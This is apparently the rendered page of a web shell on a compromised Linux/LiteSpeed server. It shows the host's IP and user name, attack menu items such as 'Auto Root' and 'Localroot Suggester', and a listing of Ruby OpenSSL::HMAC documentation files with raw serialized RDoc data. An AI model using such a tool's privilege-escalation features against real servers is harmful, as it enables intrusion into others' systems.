Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
OpenSSL /
HMAC /
Delete
Unzip
Name
Size
Permission
Date
Action
%3c%3c-i.ri
828
B
-rw-r--r--
2024-06-26 17:25
%3d%3d-i.ri
346
B
-rw-r--r--
2024-06-26 17:25
cdesc-HMAC.ri
1.75
KB
-rw-r--r--
2024-06-26 17:25
digest-c.ri
910
B
-rw-r--r--
2024-06-26 17:25
digest-i.ri
702
B
-rw-r--r--
2024-06-26 17:25
hexdigest-c.ri
901
B
-rw-r--r--
2024-06-26 17:25
hexdigest-i.ri
1.01
KB
-rw-r--r--
2024-06-26 17:25
initialize_copy-i.ri
262
B
-rw-r--r--
2024-06-26 17:25
inspect-i.ri
894
B
-rw-r--r--
2024-06-26 17:25
new-c.ri
1.19
KB
-rw-r--r--
2024-06-26 17:25
reset-i.ri
854
B
-rw-r--r--
2024-06-26 17:25
to_s-i.ri
888
B
-rw-r--r--
2024-06-26 17:25
update-i.ri
848
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI"digest:ETI"OpenSSL::HMAC::digest;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"PReturns the authentication code as a binary string. The _digest_ parameter ;TI"Nspecifies the digest algorithm to use. This may be a String representing ;TI":the algorithm name or an instance of OpenSSL::Digest.;To:RDoc::Markup::BlankLine S:RDoc::Markup::Heading: leveli: textI"Example;To:RDoc::Markup::Verbatim; [ I"key = 'key' ;TI":data = 'The quick brown fox jumps over the lazy dog' ;TI" ;TI"4hmac = OpenSSL::HMAC.digest('SHA1', key, data) ;TI"M#=> "\xDE|\x9B\x85\xB8\xB7\x8A\xA6\xBC\x8Az6\xF7\n\x90p\x1C\x9D\xB4\xD9";T:@format0: @fileI"$ext/openssl/lib/openssl/hmac.rb;T:0@omit_headings_from_table_of_contents_below0I"/HMAC.digest(digest, key, data) -> aString ;T0[ I"(digest, key, data);T@FI" HMAC;TcRDoc::NormalClass00